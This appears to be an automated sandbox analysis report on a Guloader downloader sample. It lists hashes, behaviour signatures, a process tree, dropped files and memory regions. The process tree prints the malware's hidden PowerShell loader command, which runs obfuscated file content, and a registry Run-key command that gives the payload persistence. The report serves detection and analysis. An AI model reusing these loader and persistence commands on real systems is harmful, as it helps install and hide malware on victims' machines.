Analysis

  • max time kernel
    152s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/04/2024, 01:00

General

  • Target

    6000507958.exe

  • Size

    563KB

  • MD5

    e0d35d2fe887cbe0b4de87f1be7d7a17

  • SHA1

    b37f59b0ec54d6c40645837dbb3a18c954346601

  • SHA256

    1ae1583b2be5c21f228a0e925652c9f5013bddf699548ca39b02670576325010

  • SHA512

    9d20fd479a57ccf51c02830744f095b5dfa98707777a8f24968aa0f0e9ac2a4de4ae348831a001b00cae9d750b9372a85248fdd15570a44ca52b90f8cf451256

  • SSDEEP

    12288:8stfWr2z5t/dtpQBEd6XT9Pi8RzDm+EYRfT7d+:8st+r2z5J9Pd6XT9Pi85REYpT7d+

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:3348
    • C:\Users\Admin\AppData\Local\Temp\6000507958.exe
      "C:\Users\Admin\AppData\Local\Temp\6000507958.exe"
      2⤵
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -windowstyle hidden "$Matines=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Moviedom230\Devenustate\Accorder\Uncoincidental\Incurvity.eft';$Intensities=$Matines.SubString(15241,3);.$Intensities($Matines)"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4104
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
          4⤵
            PID:1592
          • C:\Users\Admin\AppData\Local\Temp\Brookier.exe
            "C:\Users\Admin\AppData\Local\Temp\Brookier.exe"
            4⤵
            • Checks computer location settings
            • Loads dropped DLL
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:2932
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unphosphatizeds" /t REG_EXPAND_SZ /d "%Recolours% -windowstyle minimized $Finpudsningen=(Get-ItemProperty -Path 'HKCU:\Beakhead\').Kejserrn;%Recolours% ($Finpudsningen)"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unphosphatizeds" /t REG_EXPAND_SZ /d "%Recolours% -windowstyle minimized $Finpudsningen=(Get-ItemProperty -Path 'HKCU:\Beakhead\').Kejserrn;%Recolours% ($Finpudsningen)"
                6⤵
                • Adds Run key to start application
                • Modifies registry key
                PID:2228
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\SysWOW64\cmd.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:3184
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:5084

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Brookier.exe

        Filesize

        563KB

        MD5

        e0d35d2fe887cbe0b4de87f1be7d7a17

        SHA1

        b37f59b0ec54d6c40645837dbb3a18c954346601

        SHA256

        1ae1583b2be5c21f228a0e925652c9f5013bddf699548ca39b02670576325010

        SHA512

        9d20fd479a57ccf51c02830744f095b5dfa98707777a8f24968aa0f0e9ac2a4de4ae348831a001b00cae9d750b9372a85248fdd15570a44ca52b90f8cf451256

      • C:\Users\Admin\AppData\Local\Temp\Moviedom230\Devenustate\Accorder\Uncoincidental\Incurvity.eft

        Filesize

        76KB

        MD5

        465454d4effb2dd4458e8032988455d0

        SHA1

        3afe548209cfe0721b65fbd2b4b6019354d0d59f

        SHA256

        02e8b4c4053f7f4352c533a46471ab963a86a8156267cdffeb74c0374d2c4c79

        SHA512

        c4a6031758908fe6b48046ab25f88a8983e63c95a6d94542a4e8812d172009f72020a842ee92f42742f15665eaed3e20cd6cf3cd2f166b7ceb2306ffbcceef3d

      • C:\Users\Admin\AppData\Local\Temp\Moviedom230\Ringspinderne.Eks

        Filesize

        336KB

        MD5

        3295c50e6679be9cda4405ea4aece7bb

        SHA1

        6361360fef5d23ee39c4ea42ea48d00e5952ad9a

        SHA256

        698751c6b65fa692eace874966db90257c8166210c739be6d00a35053a30f2fa

        SHA512

        b21f13cecb5c481ca1d951847a4b54881b37c868ada0d54b39d2e784a7fc8acac7d56be1063c2090a053400fe0f149b5450d5afa840153f234ff3f08770bdcf6

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05agrwko.vzw.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\nssF31B.tmp\nsExec.dll

        Filesize

        6KB

        MD5

        5aa38904acdcc21a2fb8a1d30a72d92f

        SHA1

        a9ce7d1456698921791db91347dba0489918d70c

        SHA256

        10675f13abaee592f14382349aa35d82fb52aab4e27eef61d0c83dec1f6b73da

        SHA512

        f04740da561d7cd0dea5e839c9e1c339d4a3e63944d3566c94c921a3d170a69918a32dff3f3b43f13d55cc25a2dbb4c21104f062c324308ac5104179766402a3

      • memory/2932-68-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/2932-63-0x0000000001660000-0x0000000002146000-memory.dmp

        Filesize

        10.9MB

      • memory/2932-52-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/2932-53-0x0000000001660000-0x0000000002146000-memory.dmp

        Filesize

        10.9MB

      • memory/2932-79-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/2932-54-0x0000000077A28000-0x0000000077A29000-memory.dmp

        Filesize

        4KB

      • memory/2932-77-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/2932-55-0x00000000779A1000-0x0000000077AC1000-memory.dmp

        Filesize

        1.1MB

      • memory/2932-75-0x00000000000E0000-0x00000000000FC000-memory.dmp

        Filesize

        112KB

      • memory/2932-56-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/2932-81-0x0000000001660000-0x0000000002146000-memory.dmp

        Filesize

        10.9MB

      • memory/2932-73-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/2932-64-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/2932-70-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/2932-69-0x000000001E4A0000-0x000000001E7EA000-memory.dmp

        Filesize

        3.3MB

      • memory/2932-66-0x0000000000400000-0x0000000001654000-memory.dmp

        Filesize

        18.3MB

      • memory/3184-86-0x0000000000E20000-0x0000000000EBB000-memory.dmp

        Filesize

        620KB

      • memory/3184-85-0x0000000000600000-0x000000000063F000-memory.dmp

        Filesize

        252KB

      • memory/3184-83-0x0000000000E20000-0x0000000000EBB000-memory.dmp

        Filesize

        620KB

      • memory/3184-76-0x0000000000600000-0x000000000063F000-memory.dmp

        Filesize

        252KB

      • memory/3184-78-0x0000000000600000-0x000000000063F000-memory.dmp

        Filesize

        252KB

      • memory/3184-82-0x0000000000600000-0x000000000063F000-memory.dmp

        Filesize

        252KB

      • memory/3184-80-0x0000000000F30000-0x000000000127A000-memory.dmp

        Filesize

        3.3MB

      • memory/3348-84-0x000000000D5B0000-0x000000000EBA3000-memory.dmp

        Filesize

        21.9MB

      • memory/3348-74-0x000000000D5B0000-0x000000000EBA3000-memory.dmp

        Filesize

        21.9MB

      • memory/4104-31-0x0000000006CB0000-0x0000000006CCA000-memory.dmp

        Filesize

        104KB

      • memory/4104-49-0x00000000779A1000-0x0000000077AC1000-memory.dmp

        Filesize

        1.1MB

      • memory/4104-48-0x00000000090C0000-0x0000000009BA6000-memory.dmp

        Filesize

        10.9MB

      • memory/4104-47-0x0000000005340000-0x0000000005350000-memory.dmp

        Filesize

        64KB

      • memory/4104-46-0x0000000005340000-0x0000000005350000-memory.dmp

        Filesize

        64KB

      • memory/4104-45-0x0000000005340000-0x0000000005350000-memory.dmp

        Filesize

        64KB

      • memory/4104-44-0x0000000005340000-0x0000000005350000-memory.dmp

        Filesize

        64KB

      • memory/4104-42-0x00000000090C0000-0x0000000009BA6000-memory.dmp

        Filesize

        10.9MB

      • memory/4104-41-0x0000000073F40000-0x00000000746F0000-memory.dmp

        Filesize

        7.7MB

      • memory/4104-40-0x00000000090C0000-0x0000000009BA6000-memory.dmp

        Filesize

        10.9MB

      • memory/4104-65-0x0000000073F40000-0x00000000746F0000-memory.dmp

        Filesize

        7.7MB

      • memory/4104-67-0x00000000090C0000-0x0000000009BA6000-memory.dmp

        Filesize

        10.9MB

      • memory/4104-39-0x0000000007CE0000-0x0000000007CE4000-memory.dmp

        Filesize

        16KB

      • memory/4104-37-0x0000000005340000-0x0000000005350000-memory.dmp

        Filesize

        64KB

      • memory/4104-35-0x0000000008A40000-0x00000000090BA000-memory.dmp

        Filesize

        6.5MB

      • memory/4104-33-0x0000000007E10000-0x00000000083B4000-memory.dmp

        Filesize

        5.6MB

      • memory/4104-32-0x0000000006D00000-0x0000000006D22000-memory.dmp

        Filesize

        136KB

      • memory/4104-30-0x0000000007770000-0x0000000007806000-memory.dmp

        Filesize

        600KB

      • memory/4104-29-0x0000000005340000-0x0000000005350000-memory.dmp

        Filesize

        64KB

      • memory/4104-28-0x00000000067E0000-0x000000000682C000-memory.dmp

        Filesize

        304KB

      • memory/4104-27-0x00000000067C0000-0x00000000067DE000-memory.dmp

        Filesize

        120KB

      • memory/4104-23-0x00000000061E0000-0x0000000006534000-memory.dmp

        Filesize

        3.3MB

      • memory/4104-21-0x0000000006170000-0x00000000061D6000-memory.dmp

        Filesize

        408KB

      • memory/4104-15-0x0000000006090000-0x00000000060F6000-memory.dmp

        Filesize

        408KB

      • memory/4104-14-0x0000000005FF0000-0x0000000006012000-memory.dmp

        Filesize

        136KB

      • memory/4104-13-0x0000000005980000-0x0000000005FA8000-memory.dmp

        Filesize

        6.2MB

      • memory/4104-12-0x00000000051D0000-0x0000000005206000-memory.dmp

        Filesize

        216KB

      • memory/4104-11-0x0000000005340000-0x0000000005350000-memory.dmp

        Filesize

        64KB

      • memory/4104-10-0x0000000073F40000-0x00000000746F0000-memory.dmp

        Filesize

        7.7MB